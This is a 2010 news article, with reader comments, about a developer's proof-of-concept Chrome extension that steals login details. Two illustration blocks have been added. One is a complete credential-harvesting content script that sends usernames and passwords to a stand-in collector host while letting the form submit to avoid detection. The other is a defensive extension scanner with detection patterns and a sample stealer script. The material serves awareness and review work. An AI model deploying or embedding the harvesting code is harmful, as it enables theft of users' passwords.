Maltese developer reveals vulnerability in Google Chrome security
A Maltese software developer has described how he created a plugin for the Google Chrome browser that can watch users’ login information and send that information to him via email.
Andreas Grech used the jQuery library to write the plugin quickly and has been demonstrating the attack as a proof of concept. Writing in a blog, he said he had tested his system against Facebook, Gmail, and Twitter.
Mr Grech explained that Google Chrome allows the installation of third-party extensions that add new features to the browser. Extensions are written in JavaScript and HTML and, among other things, can manipulate the DOM (the in-memory representation of the page) of the sites the user visits.
Because an extension with access to the DOM can read the contents of form fields, including username and password fields, before a form is sent, an attacker who persuades a user to install such an extension can capture login credentials as they are typed.
"The extension I present here is very simple. Whenever a user submits a form, it tries to capture the username and password fields, sends me an email via an Ajax call to a script with these login details along with the url and then proceeds to submit the form normally as to avoid detection."
Mr Grech stressed that he had not stolen any Twitter, Facebook or Gmail accounts.
"In fact, I didn't even upload this extension to the Google Chrome repository. I have only tried this extension on myself, just to test and see if it works."
See Mr Grech's comments on
http://blog.dreasgrech.com/2010/07/stealing-login-details-with-google.html
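The following is an added illustration of the mechanism the article describes; it is not the code from Mr Grech's blog post (his version used jQuery, this one uses plain DOM calls) and it does not talk to any real server. The collector URL, the field-name heuristic and the sample forms are assumptions constructed for the example. The harvesting step is a pure function so it can be exercised outside a browser; the wiring at the bottom only runs when a `document` exists.

```javascript
// Added example of the content-script logic described in the article.
// Not the code from the blog post. COLLECTOR_URL is a hypothetical endpoint.
const COLLECTOR_URL = "https://collector.example/log";

// Heuristic for picking the "username" field: a text-like input whose
// name or id hints at a login identifier; otherwise the text-like input
// that immediately precedes the password field.
const USER_HINT = /user|login|email|uname|account/i;

// form: { action: string, fields: [{ type, name, id, value }, ...] }
// Returns null when the form carries no password field (nothing to take).
function harvestCredentials(form) {
  const fields = form.fields || [];
  const typeOf = f => (f.type || "text").toLowerCase();   // HTML default type is "text"
  const textLike = f => ["text", "email", "tel"].includes(typeOf(f));
  const pw = fields.find(f => typeOf(f) === "password");
  if (pw === undefined) return null;
  let user = fields.find(f => textLike(f) && USER_HINT.test(`${f.name || ""} ${f.id || ""}`));
  if (!user) {
    user = fields.slice(0, fields.indexOf(pw)).reverse().find(textLike);
  }
  return {
    url: form.action || "",
    username: user ? user.value : "",
    password: pw.value
  };
}

// Flatten a real <form> element into the plain shape harvestCredentials expects.
function formToRecord(formEl, pageUrl) {
  const fields = Array.from(formEl.querySelectorAll("input")).map(i => ({
    type: i.type, name: i.name, id: i.id, value: i.value
  }));
  return { action: formEl.action || pageUrl, fields };
}

// Ship the record. The transport is injected so the function is testable
// offline; in the browser it would be an XMLHttpRequest to COLLECTOR_URL.
function exfiltrate(record, send) {
  const body = JSON.stringify({
    url: record.url, username: record.username, password: record.password, ts: Date.now()
  });
  return send(COLLECTOR_URL, body);
}

// Browser-only wiring: observe every submit in the capture phase, take the
// credentials, and deliberately do NOT call preventDefault(), so the form
// submits exactly as it would without the extension (the "avoid detection"
// step in the quote above). A real implementation also has to keep the
// request alive across the navigation the submit triggers.
if (typeof document !== "undefined") {
  document.addEventListener("submit", evt => {
    const rec = harvestCredentials(formToRecord(evt.target, location.href));
    if (rec) {
      exfiltrate(rec, (url, body) => {
        const xhr = new XMLHttpRequest();
        xhr.open("POST", url, true);
        xhr.send(body);
      });
    }
  }, true);
}
```

The point worth taking from the example is that nothing in it is privileged: a content script only needs ordinary DOM access and the ability to make a request, which is exactly what an extension installed on every site gets by design. This is also why a password manager that fills the field for you does not change the picture; the value still has to land in the DOM before the form is sent.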
54 Comments
Andreas Grech
Jul 15th 2010, 16:29
I have posted a second follow up on my post: http://blog.dreasgrech.com/2010/07/stealing-login-details-with-google.html#update2
In this follow up, I talk about the malicious plugin that has just recently been discovered by Mozilla.
Daniel Gordon
Jul 15th 2010, 15:53
As my computer expert friend said after reading the comments below:
"Nerds are jealous haters".
Well done to Andreas for showing those who need to know, what is possible.
Those who already know don't really need to comment.
Unless of course they are jealous haters.
Christian Sciberras
Aug 3rd 2010, 14:54
No, just realistic people. Andreas' post is akin to someone claiming to have made a virus....when people can (nowadays) create virii at the click of a button.
Please be realistic!
Gerry Said
Jul 15th 2010, 15:49
Congratulations Andreas, that's an interesting piece of work. It's not every day that a Maltese developer is featured on Slashdot. Keep it up!
Evan Camilleri
Jul 15th 2010, 13:54
It would be interesting to know from Andreas whether Google cooperated and showed interest in his discovery. In the past I had colleagues who discovered issues in other browsers and were totally ignored by the browser developer.
A.Cortis
Jul 15th 2010, 13:24
Well, the issue of plugins with web browsers is not new at all. Installing an unreliable ActiveX component on Microsoft's Internet Explorer used to (and still does) have the same result as the one obtained by Mr Grech, as stated here. The question here is how he will manage to install the plugin which he created on a specific individual's personal computer without the same individual noticing anything. That would be interesting to know. OK, a relatively green user may install the plug-in when prompted to, but even the average user will discard such a trigger. So, sorry Andreas, it's no big deal. While congratulating you for your work, I have to say that it's not something which should raise the eyebrows of Google Chrome users. I am sure that with Microsoft's Internet Explorer 6, 6.5, 7 and 8... if people knew how many similar plugins (if not worse) exist, they would definitely prefer using Google Chrome. So, please, dear 'Times of Malta', you can praise Mr Grech's work as much as you deem necessary, but don't raise non-objective concerns for Google Chrome users. Thanks, and happy browsing to everyone!!
Andreas Grech
Jul 15th 2010, 16:21
@A. Cortis:
Yes, installing a malicious ActiveX component in IE can have the same results but the point of the post was not to specifically target Google Chrome and not other browsers. I chose to work with Google Chrome because it has been allegedly dubbed as 'the safest browser' and so I thought it would be interesting to try this experiment on it.
As regards an individual not noticing the data leaks, take a look at this article: http://news.netcraft.com/archives/2010/07/15/firefox-security-test-add-on-was-backdoored.html
Just recently, a Mozilla security testing add-on was discovered to have had a backdoor which intercepted login details and sent them to the author of the add-on. Mozilla have said that this add-on has been downloaded ~1800 times and that it still had 334 active daily users (http://blog.mozilla.com/addons/2010/07/13/add-on-security-announcement/). So, as you can see, it's really not that difficult to distribute such malicious add-ons. Keep in mind that such malicious code is usually hidden deep within the add-on so as to avoid detection.
With that said, I hope you now see how important it still is to remind people about the dangers of installing 3rd party applications on their computers.
Andreas Grech
Jul 15th 2010, 16:34
The correct link of the Mozilla blog post is: http://blog.mozilla.com/addons/2010/07/13/add-on-security-announcement/
In my previous reply, it has been incorrectly hyperlinked with the adjacent bracket and period :/
A Santos
Jul 14th 2010, 21:45
Thank you Andreas for sharing your knowledge with the rest of us through your blog. I am, however, disappointed with the Times of Malta for choosing an inappropriate heading for this article, which clearly led to their audience completely misunderstanding the goal of Andreas' research work.
Marcelle Buhagiar
Jul 14th 2010, 18:12
I would like to make people aware that not everybody has such computer skills as to realise this possibility. So thank you, Andreas.
Daniel Vassallo
Jul 14th 2010, 18:01
Well done Andreas for reaching critical mass with that blog post!... The timing of yesterday's Add-on Vulnerability Announcement by Mozilla is very interesting! ... Apart from the fact that it proves your point: http://blog.mozilla.com/addons/2010/07/13/add-on-security-announcement/
Andreas Grech
Jul 15th 2010, 16:22
@Daniel Vassallo
Yes, the timing of such a discovery is perfect.
Here's another post that discusses this discovery: http://news.netcraft.com/archives/2010/07/15/firefox-security-test-add-on-was-backdoored.html
Daniel Vassallo
Jul 15th 2010, 22:03
The fact that the rogue Mozilla Sniffer Add-On was allowed to modify the code of the well-trusted Tamper Data Add-On is definitely a vulnerability in their plugin model. I wonder if that can happen in Chrome.
Stefan Grech
Jul 14th 2010, 12:39
Why all these negative comments? For Christ's sake, he's trying to increase awareness of these plugins which some people install without even knowing what they consist of. I think Mr Grech did a great job increasing the awareness of us Google Chrome users: although it's the so-called safest browser around, it can still be vulnerable to these third-party plugins which could steal the user's personal information! Please keep in mind that not all people are "computer experts" like most of you guys and some may find this article very useful indeed.
Darren Mizzi
Jul 15th 2010, 07:54
Andreas's point was to prove and show again (especially to those who are not acquainted with such things) the security implications.
Hence everyone is right in saying that this is no vulnerability. Had the article been about security, and about proving that such risks exist using this code, then there would have been no issue - but to imply that a Maltese developer revealed a vulnerability in Google Chrome security when all he did was show how an existing known issue can be exploited is not correct. Hence the negative comments. I am more than sure that all people want to be aware of security :)
Jurgen Grech
Jul 14th 2010, 10:33
But how everyone in this country wants to criticise and grumble about everything! Unbelievable!!! Give him credit and be done with it! Well done Andreas! We not only share the same surname, but also the same passion for IT apparently!
Darren Mizzi
Jul 14th 2010, 08:00
First of all, this is no vulnerability at all - and even if it were, it has not been confirmed by Google, so I think we should wait for their feedback. A piece of application code using jQuery was written to access local information - nothing else! If this were uploaded to the repository they would not accept it, and even if they did, it is third-party non-trusted software, which will warn you too.
The comments on Slashdot regarding this article from professional tech people confirm such a line of thought. http://tech.slashdot.org/article.pl?sid=10/07/10/1736205
Of course this is my opinion and nothing else.
Andreas Grech
Jul 14th 2010, 13:48
@Darren:
In my post, I have never stated that this is a vulnerability.
As regards not being accepted to the local repository, take a look at this Mozilla blog article: http://blog.mozilla.com/addons/2010/07/13/add-on-security-announcement/
An add-on has been found in their repository which has affected hundreds of users. They clearly state that "Unreviewed add-ons are scanned for known viruses, trojans, and other malware, but some types of malicious behavior can only be detected in a code review."
So if this technique is embedded in a fully-fledged extension that constantly sends requests, it won't be so easy to spot; and when it does get detected, maybe it could have already affected people: "Mozilla Sniffer has been downloaded approximately 1,800 times since its submission and currently reports 334 active daily users. "
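Mozilla's note that "some types of malicious behavior can only be detected in a code review" raises the question of where such a review starts. As an added example (not code from the blog post, from Mozilla or from Google), the block below is the first-pass triage a reviewer could run over an unpacked Chrome extension before reading it line by line: it flags the combination the extension in the article needs, namely a content script injected into every site together with code that reads password fields and talks to the network. The manifest keys used are the real Chrome extension manifest keys (`content_scripts`, `matches`, `permissions`); the indicator regexes, the sample manifest and the sample script are constructed for the example.

```javascript
// Added example: static triage of an unpacked Chrome extension.
// Not the blog post's code. Sample inputs at the bottom are constructed.

// Match patterns that put a content script (or host permission) on every site.
const BROAD_MATCH = /^(<all_urls>|\*:\/\/\*\/\*|https?:\/\/\*\/\*)$/;
const SENSITIVE_PERMS = ["tabs", "cookies", "history", "webRequest", "webRequestBlocking", "webNavigation"];

// Cheap source-level indicators. Individually common, together telling.
const INDICATORS = [
  { id: "password-field", re: /type\s*=\s*["']?password|:password\b|input\[type=["']?password/i },
  { id: "submit-hook",    re: /addEventListener\(\s*["']submit["']|\.submit\(\s*function|onsubmit/i },
  { id: "network-send",   re: /XMLHttpRequest|\bfetch\(|\$\.(ajax|post|get)\(|sendBeacon|new Image\(\)/i },
  { id: "obfuscation",    re: /\beval\(|unescape\(|String\.fromCharCode|atob\(/i },
];

// Findings from manifest.json alone.
function triageManifest(manifest) {
  const findings = [];
  (manifest.content_scripts || []).forEach((cs, i) => {
    const broad = (cs.matches || []).filter(m => BROAD_MATCH.test(m));
    if (broad.length) {
      findings.push({ where: `content_scripts[${i}]`,
                      what: `injected into every site (${broad.join(", ")})`,
                      files: cs.js || [] });
    }
  });
  const perms = manifest.permissions || [];
  const hostPerms = perms.filter(p => p === "<all_urls>" || /:\/\//.test(p));
  if (hostPerms.length) {
    findings.push({ where: "permissions", what: `cross-origin requests allowed to ${hostPerms.join(", ")}`, files: [] });
  }
  const sensitive = perms.filter(p => SENSITIVE_PERMS.includes(p));
  if (sensitive.length) {
    findings.push({ where: "permissions", what: `sensitive APIs: ${sensitive.join(", ")}`, files: [] });
  }
  return findings;
}

// Indicator hits for one script file.
function scanSource(name, src) {
  return INDICATORS.filter(ind => ind.re.test(src)).map(ind => ({ file: name, indicator: ind.id }));
}

// Whole-extension verdict. files: { "content.js": "<source>", ... }
function triageExtension(manifest, files) {
  const manifestFindings = triageManifest(manifest);
  const hits = Object.entries(files).flatMap(([name, src]) => scanSource(name, src));
  const ids = new Set(hits.map(h => h.indicator));
  const injectedEverywhere = manifestFindings.some(f => f.where.startsWith("content_scripts"));
  const credentialTheftPattern = injectedEverywhere && ids.has("password-field") && ids.has("network-send");
  let verdict = "low";
  if (credentialTheftPattern) verdict = "manual code review required: credential-theft pattern";
  else if (manifestFindings.length || hits.length) verdict = "review";
  return { verdict, manifestFindings, hits };
}

// Constructed sample with the shape of the extension the article describes.
const SAMPLE_MANIFEST = {
  name: "Helpful Toolbar", version: "1.0",
  permissions: ["tabs", "http://*/*", "https://*/*"],
  content_scripts: [{ matches: ["http://*/*", "https://*/*"], js: ["jquery.js", "content.js"] }]
};
const SAMPLE_FILES = {
  "jquery.js": "/* library code, trimmed for the example */",
  "content.js": [
    "$(document).submit(function () {",
    "  var p = $('input[type=password]').val();",
    "  $.post('http://collector.example/log', { p: p, u: location.href });",
    "});"
  ].join("\n")
};
```

Two caveats a reviewer needs to keep in mind. A bundled library such as the real jQuery will itself trigger the network-send and obfuscation indicators, so compare library files against known-good copies (a hash match) and score only the extension's own scripts. And a negative result says nothing: an extension that fetches its real payload at run time, or builds the selector from pieces, passes this check and is exactly the "hidden deep within the add-on" case mentioned above, which is why the scan is a way to prioritise reviews, not a replacement for reading the code.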
D.Galea
Jul 14th 2010, 03:04
When a vulnerability is discovered, and you can be assured these are discovered all the time simply because coding on such an open-source project is in continuous development, it is simply reported on this page (http://code.google.com/p/chromium/issues/list) and it is usually solved in a very short time.
For everyone's information Google chrome is just a branded repackaging of Chromium, for which I wrote an updater extension myself.
https://chrome.google.com/extensions/detail/hcmicnfbmcjhlbdohdmdhfjlbigkcddl
Mike Bugeja
Jul 14th 2010, 00:34
Mr Grech is not uncovering any vulnerability at all (he even states this in his blog). He is just showing that installing third-party plugins in any browser out there has its risks.
So those who are criticising him should first read his blog well.
Andreas Grech
Jul 14th 2010, 13:50
@Mike:
Thanks for your comment.
At least some people have understood the point of my post.
Michael Attard
Jul 13th 2010, 23:56
As usual, people miss the point of a proof of concept. The idea of any library (such as jQuery) is to avoid having to reinvent the wheel each time. If you want to do that, I pity you, because you're losing too much time doing things that have already been done.
What this guy here has done is put together a number of pieces, that demonstrate how the structure of Google Chrome can be abused. Couple this with some other future vulnerability that auto installs background plugins, and you get a big security risk.
It's these types of efforts that highlight flaws and are useful to improve products such as browsers. Criticism of browsers such as this one will only help to make them better!!
Stop whining, and grow up!
Christian Sciberras
Jul 14th 2010, 08:36
It's not whining, it's being realistic. This is no jQuery flaw; for your information, if someone executes some JavaScript, it doesn't require jQuery at all.
As a comparison, I can boast I've found a new vulnerability in all existing browsers: allowing a malicious attacker to somehow force a user to download a malicious file.
Except that such a vulnerability will probably get marked "no fix" in any bug tracking system...
I agree, people should grow up; having the ability to operate a blog doesn't mean you're any particularly good at security. And shouting out flaws before even checking your work is even more immature.
C. Abela
Jul 13th 2010, 23:52
While I agree reports should always be as accurate as possible, as a layman and not a computer programmer, for me the point of this story is that he did it. This story succeeds in telling me that Google Chrome is not safe, like many other programs about. So from my point of view, as someone who does not know about computer programming, which means I am like the majority of the population, yes, this report definitely revealed a vulnerability in Google Chrome. So why split hairs? Isn't it a bit like buying a supposedly high-security lock only to find it can be opened easily? Now whether the person who discovered the lock's weakness used a hairpin or a hammer, it still shows a weakness in my opinion.
Christian Sciberras
Jul 14th 2010, 08:39
OK, let me put this in layman's terms for you.
What he did can be replicated in ANY BROWSER (Firefox, MSIE, Opera, Safari etc.) and has existed SINCE THE 1990s, when Internet Explorer supported ActiveX plugins.
So sure, Google Chrome is "flawed"; as are all the other browsers. Now if you want to keep away from the Internet indefinitely, be my guest.
M Azzopardi
Jul 13th 2010, 23:18
Nothing groundbreaking here, simply a few lines of code which any one of us could have written. As well noted by other users, a Chrome user has to install the application for it to start doing some damage.
Mr Grech has only developed an application of the kind the online community has been warned to avoid for a number of years.
Andreas Grech
Jul 14th 2010, 14:10
@M. Azzopardi:
Yes, obviously anyone who knows simple JavaScript could have written this code. So, what is your point exactly? I did not write the post to show my JavaScript skills.
And also, a user has to OK the extension before being installed in their browser, yes. Google Chrome and other browsers even give you a warning before installing 3rd party extensions. Yet, the reality is that many users disregard the warning completely.
Here's an example: http://blog.mozilla.com/addons/2010/07/13/add-on-security-announcement/
That Mozilla article was written yesterday, and in it they talk about an add-on, Mozilla Sniffer, that intercepts login details and sends this data to a remote location:
"Mozilla Sniffer has been downloaded approximately 1,800 times since its submission and currently reports 334 active daily users. "
The point of my post is to make people more aware that such malicious activities can happen, and just because a warning is presented to the user before installing, doesn't mean that the user will read it.
Maybe with a demonstration, like the example in my post, people will be more careful.
Adrian Borg
Jul 13th 2010, 21:12
Much ado about nothing!
Andreas here just produced malware and has not uncovered any sort of issue in Google Chrome, as the thing he programmed is not part of Google Chrome and would never be approved!
Apart from that, he just copied jQuery libraries and plugins developed by others and has not developed his own.
I visited his blog and was not impressed at all ... just another mediocre wanna-be!
Andreas Grech
Jul 13th 2010, 22:05
@Adrian:
I did not produce any sort of malware. The reason I wrote the post is to make people more aware of the dangers concerning the installation of 3rd party applications. What I demonstrated was a proof of concept that an attacker could implement to steal login credentials.
I did not upload the extension to the Google Chrome repository because my intent was not to exploit people but to show what can be done.
The extension was written by myself using the jQuery framework and nothing was stolen. jQuery is dual-licensed under the MIT license and the GNU General Public License. If you think that I have stolen something, please review the specifications of those licenses and comment again.
Julian Esposito
Jul 13th 2010, 20:12
I'm sorry, but this is not a vulnerability! If you decide to install an unsafe plug-in from an untrusted source which has full access to the DOM, then YOU are asking for trouble. The vulnerability is the user, not Google Chrome. That is how plug-ins are meant to work.
Andreas Grech
Jul 13th 2010, 22:07
@Julian:
As you have correctly said, the "vulnerability" is the user, not the browser. That's why we need to make people more aware about the situation and what can be maliciously done with these extensions.
PS. I never used the word "vulnerability" in my post.
Joe Mifsud
Jul 13th 2010, 19:47
A plugin is essentially nothing more than a normal computer program which is run by some other program (usually with the purpose of extending the functionality of the calling program). Computer programs which spy on users' actions have existed for ages!
Also, before publishing articles The Times should try to verify their statements. This is not a vulnerability in Google Chrome. The plugin is installed with the user's knowledge and the user has to provide a level of trust to the program. Under the same assumption I could say "I have found vulnerabilities in Windows/Mac/Linux" because it is fairly trivial to write an application to monitor user actions and send it to myself by email.
I would rephrase this title to "Maltese developer develops spy plugin for Google Chrome".
Also, I challenge the developer or others to gain access to my DOM in Google Chrome - obviously it is only possible if I install the spyware/virus which he wrote...
Andreas Grech
Jul 13th 2010, 22:26
@Joe:
You have completely missed the point of my post. I didn't write this extension to spy on people. Why would you ever have such a misconception? Actually, come to think of it, have you even read my post?
First off, I have never said that this is a vulnerability in the Google Chrome browser. Secondly, as regards your comment about gaining access to "your DOM" (whatever that means), as I stated earlier on, you have completely missed the point of my post.
My post was to make users more aware that such malicious activities can happen when dabbling with 3rd party extensions. Since when has it become wrong to remind people about their security and protection of private data?
Joe Mifsud
Jul 14th 2010, 10:10
@Andreas
Also, I was not indicating that you wrote the plugin to spy on people. I said that you wrote spyware, which is true, correct? I am not implying that you intend to use it for malicious purposes, but simply that you wrote a spyware plugin which is no different from the archives of spyware available on the net, which come in many different forms including plugins. I made this statement simply to point out that no, no 'vulnerability' was found as The Times reported. If you want to state that the users are the vulnerability (which is most often the case) that is fine, but The Times should not pretend that this is breaking news :)
Jack Sparrow
Jul 13th 2010, 18:48
Browser extensions (whether Chrome, IE or Firefox) are meant to have access to the whole DOM. That's what gives them all their flexibility. And that is why before an extension can be released to the public, it has to be digitally signed using a certificate from a trusted certification authority which reviews the extension independently and flags it as safe if found to be so. Much fuss about nothing.
Rowena Scicluna
Jul 13th 2010, 18:42
@M.Caruana: What is "the traditional google"? Google Chrome is an internet Browser, whilst Google is an internet company that provides many online services & web applications, amongst them Chrome. They are definitely not the same thing.
M.Caruana
Jul 13th 2010, 21:47
What I meant by traditional Google is the old search engine. I only tried installing the new Google Chrome and actually ended up infected with a virus instead. As others implied, once you start installing unsafe plug-ins you are asking for trouble. Even with ActiveX one must be cautious.
JosephA Borg
Jul 15th 2010, 17:17
"even with ActiveX one must be cautious"
Actually ActiveX seems to be the worst security example you could come up with… I assume you installed the chromium plugin that makes IE sort of behave like a good internet citizen.
You might want to try a Google Chrome instead of IE or Firefox or Safari or Opera… they're all better choices than Internet Explorer … really …
Martin Spiteri
Jul 13th 2010, 18:37
@ Joe Polidano - There is no need to go to that extreme. I use Lynx browser, secure, fast etc. http://en.wikipedia.org/wiki/Lynx_(web_browser) For sure there is no better browser than it!
Also, the above is not a vulnerability, but the plugins in the browser have access to such information, by design! That is why users are recommended to know what they are installing!
Ivan Zammit
Jul 13th 2010, 18:31
'jQuery' is a powerful JavaScript library and not something that the gentleman has developed. It is something that developers use to write code.
I'm aware that this is the so called 'silly season' and it is very tempting for journalists to write frivolous stuff. Perhaps it would be more opportune therefore to make sure that you get the facts right and before making a fuss about nothing!
Andreas Grech
Jul 15th 2010, 16:26
@Ivan Zammit:
Yes, it's unfortunate that such a mistake has been made by the reporter. Thankfully, it has now been fixed.
Oh and just to make it clear to everyone: I did not develop an extension named jQuery -_-
Joe Polidano
Jul 13th 2010, 18:23
To prevent such malicious attacks it is best to make use of the telnet client. Let me illustrate:
telnet www.google.com 80
Trying 72.14.221.104...
Connected to www.l.google.com.
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.0 302 Found
Location: http://www.google.com.mt/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=2ed7a5f917921f2b:TM=1279037985:LM=1279037985:S=qBKe5NeMKyiXtk9L; expires=Thu, 12-Jul-2012 16:19:45 GMT; path=/; domain=.google.com
Set-Cookie: NID=36=n9urDnedtmQMkpCuNVwM3JGv5GdtioYS7iMoBouKjl8vvKH4VjyG2Kq9KCRLIFRV4G6ImA8xAZCv1FP4l_MWgAX6iFmOuIftkvLuoxllTjWc2jQjU8leZyiqgqZEOUWL; expires=Wed, 12-Jan-2011 16:19:45 GMT; path=/; domain=.google.com; HttpOnly
Date: Tue, 13 Jul 2010 16:19:45 GMT
Server: gws
Content-Length: 222
X-XSS-Protection: 1; mode=block
302 Moved
302 Moved
The document has moved
here.
Connection closed by foreign host.
Not as fast as running Google Chrome or any insecure web browser, but surely safer. Plus it's built into all modern computers!
Joe Mifsud
Jul 13th 2010, 19:51
I'm not sure if this is sarcasm or not... if it is sarcasm and you are insinuating that users should use telnet to browse the web then good joke :)
If not, I have no idea what you are on about!
Also, if you try your example on an SSL port the following error code is returned:
SSL Error Response: Z0BB1
O Darmanin
Jul 13th 2010, 23:01
Lol ... I loved this one !!! and maybe you'd need to interpret HTML code and execute all the scripts manually as well, trapping any security issues as you go along :)
good one.
Edward Vella
Jul 13th 2010, 18:06
I will still use Google Chrome regardless of this vulnerability. This problem can be solved by signing up to LastPass and installing the Google Chrome extension. All you need to do is log into LastPass and not save your passwords in Google Chrome, but in LastPass. It's an online service and LastPass will be the only password you'll need to remember by heart for ever; it is also used on Mozilla, Internet Explorer, on your iPhone, BlackBerry, Android, Symbian and Windows Phone. Try using this service: it's free to use, and has premium features for $1 a month, which is less than 12 euros a year for a brilliant service.
here is the link
http://www.lastpass.com/
Joe Mifsud
Jul 13th 2010, 20:03
Besides sounding like an advert, you are incorrect in your assumption that LastPass helps with this 'vulnerability'.
LastPass is simply a password manager. Your password is still entered into the browser programmatically using LastPass instead of using the keyboard. This results in the related changes in the DOM in the browser. This 'vulnerability' extracts information from the DOM. So, no, LastPass doesn't help. Even in other net attacks (such as man in the middle), the password is still sent over the same internet connections and using the same encodings, so it is just as vulnerable as not using LastPass.
From what I can tell LastPass will just cause pain for people who use it. If you rely on one password to use LastPass (and LastPass then outputs different passwords according to the site), then what will you do when you are not on your PC which has LastPass installed? Or better yet, when you are on a PC where you do not have access to install new software (such as LastPass)? Seems like a hassle to me.
Christian Sciberras
Jul 13th 2010, 17:57
With regards to my earlier comment, note that I'm reproachful to the media's attention towards popular topics, rather than real news.
Ian Bugeja
Jul 13th 2010, 17:55
It's not a vulnerability but it's the way things work in any browser. That is why addons do get approved and undergo serious tests.
Most browsers do prompt users to be sure what they install before doing so. The same applies for anything you install.
Andreas Grech
Jul 13th 2010, 22:29
@Ian:
I never said that this is a vulnerability in the Google Chrome browser. And although it's true that users are warned before installing 3rd party applications, the reality is that the majority of users do not regard these warnings, and that was the point of my post.
I am simply saying that people should be careful about what they install on their computers.
Christian Sciberras
Jul 13th 2010, 17:54
Uhhh big deal?!
Browser plugins were never meant to be "secure", starting from ActiveX, NPAPI (Firefox and co.), Firefox XUL and Opera. What makes Chrome any different?
He might have broken a layer of security in a browser which does not exist in others.
I think security issues such as dumps of the Maltese Central Bank DB or security policy issues on government websites would have been more newsworthy...
I guess it all comes down to having friends in the right places...
M.Caruana
Jul 13th 2010, 17:48
Well done Andreas Grech. We have so much talent in this country; it is our best and only resource that saves us all. I never trusted or used Google Chrome myself. I much prefer the traditional Google.
Christian Sciberras
Jul 13th 2010, 18:23
What do you mean by "Google Chrome" and "traditional Google"? If you're speaking of the search engine, it doesn't have anything to do with a web browser.
As to local talent...sure as long as you get them to cooperate. But that doesn't happen; we both have web developers from the 90's and modern "web 2.0" developers - each going their own way.
It's how competition works in Malta, it simply had to turn out to be destructive.
Andreas Grech
Jul 14th 2010, 00:44
@Christian:
"as long as you get them to cooperate. But that doesn't happen;"
What exactly are you implying?
Christian Sciberras
Jul 14th 2010, 08:40
That local companies do not cooperate at all??